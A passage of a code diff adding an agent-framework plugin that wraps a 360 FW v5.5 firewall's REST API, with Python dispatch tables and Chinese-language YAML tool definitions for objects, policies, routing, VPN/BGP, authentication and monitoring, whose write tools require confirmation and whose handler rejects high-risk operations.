+    "fw_serviceobj_create": ("POST", "/serviceobj", lambda a: payload_or(a, build_serviceobj_body)),
+    "fw_serviceobj_update": ("PUT", "/serviceobj", lambda a: payload_or(a, build_serviceobj_body)),
+    "fw_serviceobj_delete": ("DELETE", "/serviceobj", lambda a: payload_or(a, build_delete_name_body)),
+    "fw_policy_group_create": ("POST", "/policy_group", lambda a: payload_or(a, build_policy_group_body)),
+    "fw_policy_group_delete": ("DELETE", "/policy_group", lambda a: payload_or(a, lambda x: {"name": require_text(x.get("name"), "name"), "protocol": str(x.get("protocol") or "1"), "del_act": str(x.get("del_act") or "0")})),
+    "fw_fwpolicy_state_update": ("PUT", "/fwpolicy_state", lambda a: payload_or(a, build_fwpolicy_state_body)),
+    "fw_static_route_create": ("POST", "/static_route?protocol=1", lambda a: payload_or(a, build_static_route_body)),
+    "fw_static_route_delete": ("DELETE", "/static_route?protocol=1", lambda a: payload_or(a, build_static_route_body)),
+}
+
+
+def _add_raw_specs(actions: dict[str, tuple[str, str]]) -> None:
+    for action, (method, path) in actions.items():
+        ACTION_SPECS.setdefault(action, (method, path, lambda a: require_payload(a.get("body"))))
+
+
+# Register the mutation actions whose request body is taken verbatim from
+# args["body"]: action name -> (HTTP method, path). Names that already exist
+# in ACTION_SPECS keep their dedicated builder.
+_add_raw_specs(
+    {
+        "fw_addressgroup_create": ("POST", "/addressgroup"),
+        "fw_addressgroup_update": ("PUT", "/addressgroup"),
+        "fw_addressgroup_delete": ("DELETE", "/addressgroup"),
+        "fw_servicegroup_create": ("POST", "/servicegroup"),
+        "fw_servicegroup_update": ("PUT", "/servicegroup"),
+        "fw_servicegroup_delete": ("DELETE", "/servicegroup"),
+        "fw_dom_obj_create": ("POST", "/dom_obj"),
+        "fw_dom_obj_delete": ("DELETE", "/dom_obj"),
+        "fw_dns_custom_create": ("POST", "/dns_custom"),
+        "fw_dns_custom_update": ("PUT", "/dns_custom"),
+        "fw_dns_custom_delete": ("DELETE", "/dns_custom"),
+        "fw_dns_group_create": ("POST", "/dns_group"),
+        "fw_dns_group_update": ("PUT", "/dns_group"),
+        "fw_dns_group_delete": ("DELETE", "/dns_group"),
+        "fw_timeabsobj_create": ("POST", "/timeabsobj"),
+        "fw_timeabsobj_delete": ("DELETE", "/timeabsobj"),
+        "fw_timecycobj_create": ("POST", "/timecycobj"),
+        "fw_timecycobj_update": ("PUT", "/timecycobj"),
+        "fw_timecycobj_delete": ("DELETE", "/timecycobj"),
+        "fw_app_obj_create": ("POST", "/app_obj"),
+        "fw_app_obj_update": ("PUT", "/app_obj"),
+        "fw_app_obj_delete": ("DELETE", "/app_obj"),
+        "fw_app_group_create": ("POST", "/app_group"),
+        "fw_app_group_delete": ("DELETE", "/app_group"),
+        "fw_blackList_group_create": ("POST", "/blackList_group"),
+        "fw_blackList_group_delete": ("DELETE", "/blackList_group"),
+        "fw_blackListGroup_rename": ("PUT", "/blackListGroup_rename"),
+        "fw_xml_av_profile_create": ("POST", "/xml_av_profile"),
+        "fw_xml_av_profile_update": ("PUT", "/xml_av_profile"),
+        "fw_xml_av_profile_delete": ("DELETE", "/xml_av_profile"),
+        "fw_signature_set_create": ("POST", "/signature_set"),
+        "fw_signature_set_update": ("PUT", "/signature_set"),
+        "fw_signature_set_delete": ("DELETE", "/signature_set"),
+        "fw_fwpolicy_create": ("POST", "/fwpolicy"),
+        "fw_fwpolicy_update": ("PUT", "/fwpolicy"),
+        "fw_fwpolicy_delete": ("DELETE", "/fwpolicy"),
+        "fw_fwpolicy_move": ("PUT", "/fwpolicy_move"),
+        "fw_app_policy_create": ("POST", "/app_policy"),
+        "fw_app_policy_delete": ("DELETE", "/app_policy"),
+        "fw_web_policy_create": ("POST", "/web_policy"),
+        "fw_web_policy_delete": ("DELETE", "/web_policy"),
+        "fw_black_list_create": ("POST", "/black_list"),
+        "fw_black_list_delete": ("DELETE", "/black_list"),
+        "fw_white_list_create": ("POST", "/white_list"),
+        "fw_white_list_delete": ("DELETE", "/white_list"),
+        "fw_multiple_domains_create": ("POST", "/multiple_domains"),
+        "fw_multiple_domains_delete": ("DELETE", "/multiple_domains"),
+        "fw_multiple_ids_create": ("POST", "/multiple_ids"),
+        "fw_multiple_ids_delete": ("DELETE", "/multiple_ids"),
+        "fw_protect_policy_create": ("POST", "/protect_policy"),
+        "fw_protect_policy_delete": ("DELETE", "/protect_policy"),
+        "fw_protect_policy_enable_update": ("PUT", "/protect_policy_enable"),
+        "fw_vsys_create": ("POST", "/vsys"),
+        "fw_vsys_update": ("PUT", "/vsys"),
+        "fw_vsys_delete": ("DELETE", "/vsys"),
+        "fw_vlan_create": ("POST", "/vlan"),
+        "fw_vlan_update": ("PUT", "/vlan"),
+        "fw_vlan_delete": ("DELETE", "/vlan"),
+        "fw_healthcheck_create": ("POST", "/healthcheck_list"),
+        "fw_healthcheck_update": ("PUT", "/healthcheck_list"),
+        "fw_healthcheck_delete": ("DELETE", "/healthcheck_list"),
+        "fw_link_health_check_create": ("POST", "/link_health_check"),
+        "fw_link_health_check_update": ("PUT", "/link_health_check"),
+        "fw_link_health_check_delete": ("DELETE", "/link_health_check"),
+        "fw_qos_line_create": ("POST", "/qos_line"),
+        "fw_qos_line_update": ("PUT", "/qos_line"),
+        "fw_qos_line_delete": ("DELETE", "/qos_line"),
+        "fw_qos_policy_create": ("POST", "/qos_policy"),
+        "fw_qos_policy_delete": ("DELETE", "/qos_policy"),
+        "fw_nat_pool_create": ("POST", "/nat_pool"),
+        "fw_nat_pool_delete": ("DELETE", "/nat_pool"),
+        "fw_policy_route_create": ("POST", "/policy_route"),
+        "fw_policy_route_delete": ("DELETE", "/policy_route"),
+        "fw_sdwan_policy_create": ("POST", "/sdwan_policy"),
+        "fw_sdwan_policy_delete": ("DELETE", "/sdwan_policy"),
+        "fw_gre_create": ("POST", "/gre"),
+        "fw_gre_update": ("PUT", "/gre"),
+        "fw_gre_delete": ("DELETE", "/gre"),
+        "fw_tunnel_monitor_create": ("POST", "/tunnel_monitor"),
+        "fw_tunnel_monitor_delete": ("DELETE", "/tunnel_monitor"),
+        "fw_autoike_create": ("POST", "/autoike"),
+        "fw_autoike_delete": ("DELETE", "/autoike"),
+        "fw_phase2ike_create": ("POST", "/phase2ike"),
+        "fw_phase2ike_delete": ("DELETE", "/phase2ike"),
+        "fw_ipsec_policy_create": ("POST", "/ipsec_policy"),
+        "fw_ipsec_policy_delete": ("DELETE", "/ipsec_policy"),
+        "fw_bgp_info_create": ("POST", "/bgp_info"),
+        "fw_bgp_info_delete": ("DELETE", "/bgp_info"),
+        "fw_bgp_network_create": ("POST", "/bgp_network"),
+        "fw_bgp_network_delete": ("DELETE", "/bgp_network"),
+        "fw_bgp_peer_group_create": ("POST", "/bgp_peer_group"),
+        "fw_bgp_peer_group_delete": ("DELETE", "/bgp_peer_group"),
+        "fw_bgp_neighbors_create": ("POST", "/bgp_neighbors"),
+        "fw_bgp_neighbors_delete": ("DELETE", "/bgp_neighbors"),
+        "fw_bgp_access_list_create": ("POST", "/bgp_access_list"),
+        "fw_bgp_access_list_delete": ("DELETE", "/bgp_access_list"),
+        "fw_bgp_filter_list_create": ("POST", "/bgp_filter_list"),
+        "fw_bgp_filter_list_delete": ("DELETE", "/bgp_filter_list"),
+        "fw_bgp_route_map_create": ("POST", "/bgp_route_map"),
+        "fw_bgp_route_map_delete": ("DELETE", "/bgp_route_map"),
+        "fw_bgp_map_list_create": ("POST", "/bgp_map_list"),
+        "fw_bgp_map_list_delete": ("DELETE", "/bgp_map_list"),
+        "fw_bgp_prefix_list_create": ("POST", "/bgp_prefix_list"),
+        "fw_bgp_prefix_list_delete": ("DELETE", "/bgp_prefix_list"),
+        "fw_bgp_prefix_policy_create": ("POST", "/bgp_prefix_policy"),
+        "fw_bgp_prefix_policy_delete": ("DELETE", "/bgp_prefix_policy"),
+        "fw_bgp_import_check_update": ("PUT", "/bgp_import_check"),
+        "fw_bgp_reflector_switch_update": ("PUT", "/bgp_reflector_switch"),
+        "fw_bgp_timer_update": ("PUT", "/bgp_timer"),
+        "fw_bgp_route_reflector_create": ("POST", "/bgp_route_reflector"),
+        "fw_bgp_route_reflector_delete": ("DELETE", "/bgp_route_reflector"),
+        "fw_user_create": ("POST", "/user"),
+        "fw_user_delete": ("DELETE", "/user"),
+        "fw_user_group_create": ("POST", "/user_group"),
+        "fw_user_group_update": ("PUT", "/user_group"),
+        "fw_user_group_delete": ("DELETE", "/user_group"),
+        "fw_radius_create": ("POST", "/radius"),
+        "fw_radius_update": ("PUT", "/radius"),
+        "fw_radius_delete": ("DELETE", "/radius"),
+        "fw_ldap_create": ("POST", "/ldap"),
+        "fw_ldap_delete": ("DELETE", "/ldap"),
+        "fw_v0_0_1_syslog_server_create": ("POST", "/v0.0.1/syslog_server"),
+        "fw_v0_0_1_syslog_server_delete": ("DELETE", "/v0.0.1/syslog_server"),
+    }
+)
+
+# Action names each grouped tool accepts (checked in _dispatch_group). Most
+# sets are derived by substring-matching tokens against the GET_ACTIONS and
+# ACTION_SPECS keys, so an action whose name contains tokens from several
+# groups is a member of each of those groups.
+GROUP_ACTIONS: dict[str, set[str]] = {
+    "system": {
+        "fw_check_login",
+        *{k for k in GET_ACTIONS if k.startswith("fw_") and any(token in k for token in ("system", "interface", "ha_", "lte_", "loopback", "ntp", "syslog", "log_filter", "policy_config", "license", "virtual_route", "diagnose"))},
+    },
+    "objects": {
+        *{k for k in GET_ACTIONS if any(token in k for token in ("address", "service", "predefined", "dom_", "dns_", "time", "app_", "get_app", "blackList", "xml", "signature"))},
+        *{k for k in ACTION_SPECS if any(token in k for token in ("address", "service", "dom_", "dns_", "time", "app_", "blackList", "xml", "signature"))},
+        "fw_object_call",
+    },
+    "policy": {
+        *{k for k in GET_ACTIONS if any(token in k for token in ("fwpolicy", "policy_group", "app_policy", "web_policy", "black_list", "white_list", "protect_policy"))},
+        *{k for k in ACTION_SPECS if any(token in k for token in ("fwpolicy", "policy_group", "app_policy", "web_policy", "black_list", "white_list", "multiple_", "protect_policy", "vsys"))},
+        "fw_policy_call",
+    },
+    "network": {
+        *{k for k in GET_ACTIONS if any(token in k for token in ("interface", "vlan", "vxlan", "static_route", "health", "qos", "nat_", "policy_route", "sdwan", "woc", "gre"))},
+        *{k for k in ACTION_SPECS if any(token in k for token in ("vlan", "static_route", "health", "qos", "nat_", "policy_route", "sdwan", "gre", "tunnel_monitor"))},
+        "fw_network_call",
+    },
+    "vpn_bgp": {
+        *{k for k in GET_ACTIONS if any(token in k for token in ("autoike", "ipsec", "ikesa", "tunnel_status", "bgp_"))},
+        *{k for k in ACTION_SPECS if any(token in k for token in ("autoike", "phase2ike", "ipsec", "bgp_"))},
+        "fw_vpn_bgp_call",
+    },
+    "auth_security": {
+        *{k for k in GET_ACTIONS if any(token in k for token in ("user", "radius", "ldap", "syslog"))},
+        *{k for k in ACTION_SPECS if any(token in k for token in ("user", "radius", "ldap", "syslog", "multiple_"))},
+        "fw_auth_security_call",
+    },
+    # Read-only group: built from GET_ACTIONS only, plus the raw-call entry.
+    "observability": {
+        *{k for k in GET_ACTIONS if any(token in k for token in ("cpu", "memory", "device_", "flow", "monitor", "url_", "threaten", "tunnel_status", "vxlan"))},
+        "fw_observability_call",
+    },
+    "api_readonly": {"fw_api_catalog", "fw_call_raw_readonly"},
+    "api_mutation": {"fw_call_mutation", "fw_call_api"},
+}
+
+CONNECTIVITY_TEST_ACTIONS = {
+    "system": "fw_check_login",
+    "objects": "fw_addressobj_list",
+    "policy": "fw_fwpolicy_list",
+    "network": "fw_interface_list",
+    "vpn_bgp": "fw_autoike_list",
+    "auth_security": "fw_user_group_list",
+    "observability": "fw_cpu_state",
+    "api_readonly": "fw_api_catalog",
+}
+
+
+def fw_check_login(args: dict[str, Any]) -> ToolResult:
+    return ok(get_client().login())
+
+
+def fw_api_catalog(args: dict[str, Any]) -> ToolResult:
+    return ok(
+        {
+            "documented_rest_api_resources": DOCUMENTED_API_METHODS,
+            "blocked_high_risk_resources": BLOCKED_HIGH_RISK_MUTATIONS,
+            "known_problem_resources": KNOWN_PROBLEM_RESOURCES,
+            "covered_by": {
+                "GET": "fw_call_raw_readonly or fw_call_api",
+                "POST_PUT_DELETE": "fw_call_mutation or fw_call_api",
+                "grouped_tools": sorted(GROUP_ACTIONS),
+            },
+            "version": {
+                "product_version": PRODUCT_VERSION,
+                "fw_software_version": FW_SOFTWARE_VERSION,
+                "version_software": FW_BUILD_VERSION,
+            },
+        }
+    )
+
+
+def call_get_action(action: str, args: dict[str, Any]) -> ToolResult:
+    path = GET_ACTIONS[action]
+    if action == "fw_interface_get":
+        query = query_from_args(args, ["name"])
+    elif action.endswith("_get") or action.endswith("_list"):
+        query = query_from_args(args, ["name", "id", "custom_name", "app_id", "ip_vrf_name"])
+    else:
+        query = query_from_args(args, ["type", "period", "flow", "inf_type", "stat_type", "status_type", "page", "length", "user_type"])
+    return api_result(get_client().get(path, query=query))
+
+
+def call_action_spec(action: str, args: dict[str, Any]) -> ToolResult:
+    method, path, builder = ACTION_SPECS[action]
+    reject_high_risk_mutation(method, path)
+    validate_documented_api(method, path)
+    body = builder(args) if builder is not None else optional_payload(args.get("body"))
+    return api_result(get_client().request(method, path, query=query_from_args(args, []), body=body))
+
+
+def fw_call_raw_readonly(args: dict[str, Any]) -> ToolResult:
+    path = normalize_api_path(require_text(args.get("path"), "path"))
+    validate_documented_api("GET", path)
+    query = args.get("query")
+    if query is not None and not isinstance(query, dict):
+        raise FwApiError("query must be an object")
+    return api_result(get_client().get(path, query=query))
+
+
+def fw_call_mutation(args: dict[str, Any]) -> ToolResult:
+    method = str(args.get("method", "")).upper()
+    path = normalize_api_path(require_text(args.get("path"), "path"))
+    if method not in {"POST", "PUT", "DELETE"}:
+        raise FwApiError("method must be POST, PUT, or DELETE")
+    reject_high_risk_mutation(method, path)
+    validate_documented_api(method, path)
+    query = args.get("query")
+    if query is not None and not isinstance(query, dict):
+        raise FwApiError("query must be an object")
+    return api_result(get_client().request(method, path, query=query, body=optional_payload(args.get("body"))))
+
+
+def fw_call_api(args: dict[str, Any]) -> ToolResult:
+    method = str(args.get("method", "GET")).upper()
+    path = normalize_api_path(require_text(args.get("path"), "path"))
+    if method not in {"GET", "POST", "PUT", "DELETE"}:
+        raise FwApiError("method must be GET, POST, PUT, or DELETE")
+    if method == "GET":
+        return fw_call_raw_readonly({**args, "path": path})
+    return fw_call_mutation({**args, "method": method, "path": path})
+
+
+def grouped_raw_call(args: dict[str, Any]) -> ToolResult:
+    method = str(args.get("method", "GET")).upper()
+    if method == "GET":
+        return fw_call_raw_readonly(args)
+    return fw_call_mutation(args)
+
+
+# Dispatch table used by unified_ops: action name -> handler taking the args dict.
+_ACTION_MAP: dict[str, Callable[[dict[str, Any]], ToolResult]] = {
+    "fw_check_login": fw_check_login,
+    "fw_api_catalog": fw_api_catalog,
+    "fw_call_raw_readonly": fw_call_raw_readonly,
+    "fw_call_mutation": fw_call_mutation,
+    "fw_call_api": fw_call_api,
+    "fw_object_call": grouped_raw_call,
+    "fw_policy_call": grouped_raw_call,
+    "fw_network_call": grouped_raw_call,
+    "fw_vpn_bgp_call": grouped_raw_call,
+    "fw_auth_security_call": grouped_raw_call,
+    "fw_observability_call": grouped_raw_call,
+}
+
+# Add one handler per table-driven action. setdefault leaves the explicit
+# entries above untouched, and a GET_ACTIONS name wins over an ACTION_SPECS
+# name if the same key appears in both. The `action=_action_name` default
+# binds the current name when each lambda is created.
+for _action_name in GET_ACTIONS:
+    _ACTION_MAP.setdefault(_action_name, lambda args, action=_action_name: call_get_action(action, args))
+for _action_name in ACTION_SPECS:
+    _ACTION_MAP.setdefault(_action_name, lambda args, action=_action_name: call_action_spec(action, args))
+
+
+async def unified_ops(ctx: ToolContext, action: str, **params: Any) -> ToolResult:
+    del ctx
+    handler = _ACTION_MAP.get(action)
+    if handler is None:
+        available = ", ".join(sorted(_ACTION_MAP))
+        return ToolResult(success=False, error=f"Unknown action: {action}. Available: {available}")
+    try:
+        return await asyncio.to_thread(handler, params)
+    except FwApiError as exc:
+        return ToolResult(
+            success=False,
+            error=str(exc),
+            metadata={"source": "360 FW", "version": PRODUCT_VERSION, "action": action},
+        )
+    except Exception as exc:
+        return ToolResult(
+            success=False,
+            error=f"Unexpected 360 FW error: {exc}",
+            metadata={"source": "360 FW", "version": PRODUCT_VERSION, "action": action},
+        )
+
+
+async def _dispatch_group(ctx: ToolContext, group: str, action: str, **params: Any) -> ToolResult:
+    if action == "test":
+        test_action = CONNECTIVITY_TEST_ACTIONS.get(group)
+        if test_action:
+            return await unified_ops(ctx, action=test_action, **params)
+        return ToolResult(success=False, error=f"360 FW group {group} does not define a test probe")
+    if action not in GROUP_ACTIONS[group]:
+        available = ", ".join(sorted(GROUP_ACTIONS[group]))
+        return ToolResult(success=False, error=f"Unsupported {group} action: {action}. Available: {available}")
+    return await unified_ops(ctx, action=action, **params)
+
+
+async def system(ctx: ToolContext, action: str, **params: Any) -> ToolResult:
+    """Entry point for the "system" action group; delegates to _dispatch_group."""
+    return await _dispatch_group(ctx, "system", action, **params)
+
+
+async def objects(ctx: ToolContext, action: str, **params: Any) -> ToolResult:
+    """Entry point for the "objects" action group; delegates to _dispatch_group."""
+    return await _dispatch_group(ctx, "objects", action, **params)
+
+
+async def policy(ctx: ToolContext, action: str, **params: Any) -> ToolResult:
+    """Entry point for the "policy" action group; delegates to _dispatch_group."""
+    return await _dispatch_group(ctx, "policy", action, **params)
+
+
+async def network(ctx: ToolContext, action: str, **params: Any) -> ToolResult:
+    """Entry point for the "network" action group; delegates to _dispatch_group."""
+    return await _dispatch_group(ctx, "network", action, **params)
+
+
+async def vpn_bgp(ctx: ToolContext, action: str, **params: Any) -> ToolResult:
+    """Entry point for the "vpn_bgp" action group; delegates to _dispatch_group."""
+    return await _dispatch_group(ctx, "vpn_bgp", action, **params)
+
+
+async def auth_security(ctx: ToolContext, action: str, **params: Any) -> ToolResult:
+    """Entry point for the "auth_security" action group; delegates to _dispatch_group."""
+    return await _dispatch_group(ctx, "auth_security", action, **params)
+
+
+async def observability(ctx: ToolContext, action: str, **params: Any) -> ToolResult:
+    """Entry point for the "observability" action group; delegates to _dispatch_group."""
+    return await _dispatch_group(ctx, "observability", action, **params)
+
+
+async def api_readonly(ctx: ToolContext, action: str, **params: Any) -> ToolResult:
+    """Entry point for the "api_readonly" action group; delegates to _dispatch_group."""
+    return await _dispatch_group(ctx, "api_readonly", action, **params)
+
+
+async def api_mutation(ctx: ToolContext, action: str, **params: Any) -> ToolResult:
+    """Entry point for the "api_mutation" action group; delegates to _dispatch_group."""
+    return await _dispatch_group(ctx, "api_mutation", action, **params)
diff --git a/.flocks/flockshub/plugins/tools/device/360_fw_v5_5/360_fw_api_mutation.yaml b/.flocks/flockshub/plugins/tools/device/360_fw_v5_5/360_fw_api_mutation.yaml
new file mode 100644
index 000000000..dbcda386f
--- /dev/null
+++ b/.flocks/flockshub/plugins/tools/device/360_fw_v5_5/360_fw_api_mutation.yaml
@@ -0,0 +1,38 @@
+name: 360_fw_api_mutation
+description: >
+  360 FW v5.5 官方 REST 变更调用工具。该工具通过 Flocks requires_confirmation
+  触发确认；保存配置、改密码、清配置、重启、恢复、升级、许可写入、HA 写入、
+  全局开关写入、清会话/命中、ISP 修改、生产顺序移动、BGP 清路由等高风险接口会直接拒绝。
+category: custom
+enabled: true
+requires_confirmation: true
+provider: 360_fw
+inputSchema:
+  type: object
+  properties:
+    action:
+      type: string
+      description: REST 变更操作名称。
+      enum:
+        - fw_call_mutation
+        - fw_call_api
+        - test
+    method:
+      type: string
+      enum: [GET, POST, PUT, DELETE]
+      description: HTTP 方法。
+    path:
+      type: string
+      description: 已收录的 /API 相对路径，例如 /addressobj。
+    query:
+      type: object
+      description: 可选查询参数，会编码为普通 URL query string。
+    body:
+      type: string
+      description: POST、PUT 或 DELETE 调用使用的 JSON 请求体，传入对象或数组的 JSON 字符串。
+  required:
+    - action
+handler:
+  type: script
+  script_file: 360_fw.handler.py
+  function: api_mutation
diff --git a/.flocks/flockshub/plugins/tools/device/360_fw_v5_5/360_fw_api_readonly.yaml b/.flocks/flockshub/plugins/tools/device/360_fw_v5_5/360_fw_api_readonly.yaml
new file mode 100644
index 000000000..a6e7fe846
--- /dev/null
+++ b/.flocks/flockshub/plugins/tools/device/360_fw_v5_5/360_fw_api_readonly.yaml
@@ -0,0 +1,30 @@
+name: 360_fw_api_readonly
+description: >
+  360 FW v5.5 官方 REST 只读调用工具。可用 fw_api_catalog 查看已收录接口，
+  或用 fw_call_raw_readonly 调用已收录 GET 接口。
+category: custom
+enabled: true
+requires_confirmation: false
+provider: 360_fw
+inputSchema:
+  type: object
+  properties:
+    action:
+      type: string
+      description: REST 只读操作名称。
+      enum:
+        - fw_api_catalog
+        - fw_call_raw_readonly
+        - test
+    path:
+      type: string
+      description: 已收录的 /API 相对路径，例如 /sys_info。
+    query:
+      type: object
+      description: 可选查询参数，会编码为普通 URL query string。
+  required:
+    - action
+handler:
+  type: script
+  script_file: 360_fw.handler.py
+  function: api_readonly
diff --git a/.flocks/flockshub/plugins/tools/device/360_fw_v5_5/360_fw_auth_security.yaml b/.flocks/flockshub/plugins/tools/device/360_fw_v5_5/360_fw_auth_security.yaml
new file mode 100644
index 000000000..01496cb1a
--- /dev/null
+++ b/.flocks/flockshub/plugins/tools/device/360_fw_v5_5/360_fw_auth_security.yaml
@@ -0,0 +1,58 @@
+name: 360_fw_auth_security
+description: >
+  360 FW v5.5 认证源、管理员、用户组、syslog、联动和安全扩展对象工具。
+  写操作需要确认。
+category: custom
+enabled: true
+requires_confirmation: true
+provider: 360_fw
+inputSchema:
+  type: object
+  properties:
+    action:
+      type: string
+      description: 认证和安全对象操作名称。
+      enum:
+        - fw_user_list
+        - fw_user_create
+        - fw_user_delete
+        - fw_user_group_list
+        - fw_user_group_create
+        - fw_user_group_update
+        - fw_user_group_delete
+        - fw_user_obj_list
+        - fw_radius_list
+        - fw_radius_create
+        - fw_radius_update
+        - fw_radius_delete
+        - fw_ldap_list
+        - fw_ldap_create
+        - fw_ldap_delete
+        - fw_syslog_server_get
+        - fw_v0_0_1_syslog_server_get
+        - fw_v0_0_1_syslog_server_create
+        - fw_v0_0_1_syslog_server_delete
+        - fw_multiple_ids_create
+        - fw_multiple_ids_delete
+        - fw_multiple_domains_create
+        - fw_multiple_domains_delete
+        - fw_auth_security_call
+        - test
+    name:
+      type: string
+    method:
+      type: string
+      enum: [GET, POST, PUT, DELETE]
+    path:
+      type: string
+    query:
+      type: object
+    body:
+      type: string
+      description: 完整 JSON payload 字符串。
+  required:
+    - action
+handler:
+  type: script
+  script_file: 360_fw.handler.py
+  function: auth_security
diff --git a/.flocks/flockshub/plugins/tools/device/360_fw_v5_5/360_fw_network.yaml b/.flocks/flockshub/plugins/tools/device/360_fw_v5_5/360_fw_network.yaml
new file mode 100644
index 000000000..604117df6
--- /dev/null
+++ b/.flocks/flockshub/plugins/tools/device/360_fw_v5_5/360_fw_network.yaml
@@ -0,0 +1,90 @@
+name: 360_fw_network
+description: >
+  360 FW v5.5 网络、路由、NAT、QoS、健康检查、策略路由、SD-WAN 和 GRE 工具。
+  写操作需要确认，生产顺序移动和高风险运行态动作由 handler 拦截。
+category: custom
+enabled: true
+requires_confirmation: true
+provider: 360_fw
+inputSchema:
+  type: object
+  properties:
+    action:
+      type: string
+      description: 网络操作名称。
+      enum:
+        - fw_interface_list
+        - fw_interface_get
+        - fw_vlan_list
+        - fw_vlan_create
+        - fw_vlan_update
+        - fw_vlan_delete
+        - fw_vxlan_list
+        - fw_static_route_list
+        - fw_static_route_create
+        - fw_static_route_delete
+        - fw_healthcheck_list
+        - fw_healthcheck_create
+        - fw_healthcheck_update
+        - fw_healthcheck_delete
+        - fw_link_health_check_list
+        - fw_link_health_check_create
+        - fw_link_health_check_update
+        - fw_link_health_check_delete
+        - fw_qos_line_list
+        - fw_qos_line_create
+        - fw_qos_line_update
+        - fw_qos_line_delete
+        - fw_qos_policy_list
+        - fw_qos_policy_create
+        - fw_qos_policy_delete
+        - fw_nat_pool_list
+        - fw_nat_pool_create
+        - fw_nat_pool_delete
+        - fw_nat_rule_src_list
+        - fw_nat_rule_dst_list
+        - fw_nat_rule_static_list
+        - fw_policy_route_list
+        - fw_policy_route_create
+        - fw_policy_route_delete
+        - fw_sdwan_policy_list
+        - fw_sdwan_policy_create
+        - fw_sdwan_policy_delete
+        - fw_sdwan_status_get
+        - fw_woc_policy_state_get
+        - fw_gre_list
+        - fw_gre_create
+        - fw_gre_update
+        - fw_gre_delete
+        - fw_tunnel_monitor_create
+        - fw_tunnel_monitor_delete
+        - fw_network_call
+        - test
+    name:
+      type: string
+      description: 对象名称。
+    dst_ip:
+      type: string
+      description: 静态路由目的地址。
+    nh_ip:
+      type: string
+      description: 下一跳地址。
+    ip_vrf_name:
+      type: string
+      description: 虚拟路由器名称，默认 default。
+    method:
+      type: string
+      enum: [GET, POST, PUT, DELETE]
+    path:
+      type: string
+    query:
+      type: object
+    body:
+      type: string
+      description: 完整 JSON payload 字符串。
+  required:
+    - action
+handler:
+  type: script
+  script_file: 360_fw.handler.py
+  function: network
diff --git a/.flocks/flockshub/plugins/tools/device/360_fw_v5_5/360_fw_objects.yaml b/.flocks/flockshub/plugins/tools/device/360_fw_v5_5/360_fw_objects.yaml
new file mode 100644
index 000000000..865e0da36
--- /dev/null
+++ b/.flocks/flockshub/plugins/tools/device/360_fw_v5_5/360_fw_objects.yaml
@@ -0,0 +1,120 @@
+name: 360_fw_objects
+description: >
+  360 FW v5.5 对象工具。覆盖地址、服务、域名、DNS、时间、应用和安全对象等
+  文档中未被跳过的对象接口。写操作需要确认。
+category: custom
+enabled: true
+requires_confirmation: true
+provider: 360_fw
+inputSchema:
+  type: object
+  properties:
+    action:
+      type: string
+      description: 对象操作名称。
+      enum:
+        - fw_addressobj_list
+        - fw_addressobj_get
+        - fw_addressobj_create
+        - fw_addressobj_update
+        - fw_addressobj_delete
+        - fw_addressgroup_list
+        - fw_addressgroup_get
+        - fw_addressgroup_create
+        - fw_addressgroup_update
+        - fw_addressgroup_delete
+        - fw_serviceobj_list
+        - fw_serviceobj_get
+        - fw_serviceobj_create
+        - fw_serviceobj_update
+        - fw_serviceobj_delete
+        - fw_servicegroup_list
+        - fw_servicegroup_get
+        - fw_servicegroup_create
+        - fw_servicegroup_update
+        - fw_servicegroup_delete
+        - fw_predefined_service_list
+        - fw_dom_obj_list
+        - fw_dom_obj_create
+        - fw_dom_obj_delete
+        - fw_dns_custom_list
+        - fw_dns_custom_get
+        - fw_dns_custom_create
+        - fw_dns_custom_update
+        - fw_dns_custom_delete
+        - fw_dns_group_list
+        - fw_dns_group_get
+        - fw_dns_group_create
+        - fw_dns_group_update
+        - fw_dns_group_delete
+        - fw_timeabsobj_list
+        - fw_timeabsobj_get
+        - fw_timeabsobj_create
+        - fw_timeabsobj_delete
+        - fw_timecycobj_list
+        - fw_timecycobj_get
+        - fw_timecycobj_create
+        - fw_timecycobj_update
+        - fw_timecycobj_delete
+        - fw_app_obj_list
+        - fw_app_obj_get
+        - fw_app_obj_create
+        - fw_app_obj_update
+        - fw_app_obj_delete
+        - fw_app_group_list
+        - fw_app_group_get
+        - fw_app_group_create
+        - fw_app_group_delete
+        - fw_get_app_list
+        - fw_get_app_detail
+        - fw_blackList_group_list
+        - fw_blackList_group_create
+        - fw_blackList_group_delete
+        - fw_blackListGroup_rename
+        - fw_xml_av_profile_list
+        - fw_xml_av_profile_create
+        - fw_xml_av_profile_update
+        - fw_xml_av_profile_delete
+        - fw_signature_set_list
+        - fw_signature_set_create
+        - fw_signature_set_update
+        - fw_signature_set_delete
+        - fw_object_call
+        - test
+    name:
+      type: string
+      description: 对象名称。
+    new_name:
+      type: string
+      description: 重命名后的对象名称。
+    type:
+      type: integer
+      description: 地址对象、名单或时间对象类型。
+    addr:
+      type: string
+      description: 地址对象 IP、网段或域名。
+    desc:
+      type: string
+      description: 描述。
+    sev_str:
+      type: string
+      description: 服务对象字符串，例如 TCP/1-65535:80。
+    path:
+      type: string
+      description: fw_object_call 使用的 /API 相对路径。
+    method:
+      type: string
+      enum: [GET, POST, PUT, DELETE]
+      description: fw_object_call 使用的 HTTP 方法。
+    query:
+      type: object
+      description: 查询参数对象。
+    body:
+      type: string
+      description: 写操作完整 JSON payload 字符串；不传时部分动作会按参数生成常用 payload。
+  required:
+    - action
+handler:
+  type: script
+  script_file: 360_fw.handler.py
+  function: objects
diff --git a/.flocks/flockshub/plugins/tools/device/360_fw_v5_5/360_fw_observability.yaml b/.flocks/flockshub/plugins/tools/device/360_fw_v5_5/360_fw_observability.yaml
new file mode 100644
index 000000000..83bfeb031
--- /dev/null
+++ b/.flocks/flockshub/plugins/tools/device/360_fw_v5_5/360_fw_observability.yaml
@@ -0,0 +1,68 @@
+name: 360_fw_observability
+description: >
+  360 FW v5.5 监控观测工具。用于 CPU、内存、流量、连接、应用、URL、威胁、
+  用户、接口、QoS、隧道和 VXLAN 监控查询。
+category: custom
+enabled: true
+requires_confirmation: false
+provider: 360_fw
+inputSchema:
+  type: object
+  properties:
+    action:
+      type: string
+      description: 监控观测操作名称。
+      enum:
+        - fw_cpu_state
+        - fw_memory_state
+        - fw_device_state
+        - fw_device_link_state
+        - fw_interface_flow_state
+        - fw_interface_flow_bar_state
+        - fw_user_flow_state
+        - fw_user_flow_bar_state
+        - fw_monitor_user
+        - fw_app_flow_state
+        - fw_app_flow_bar_state
+        - fw_url_state
+        - fw_url_bar_state
+        - fw_threaten_state
+        - fw_threaten_bar_state
+        - fw_get_app_detail_monitor
+        - fw_interface_monitor
+        - fw_interface_monitor_vlan
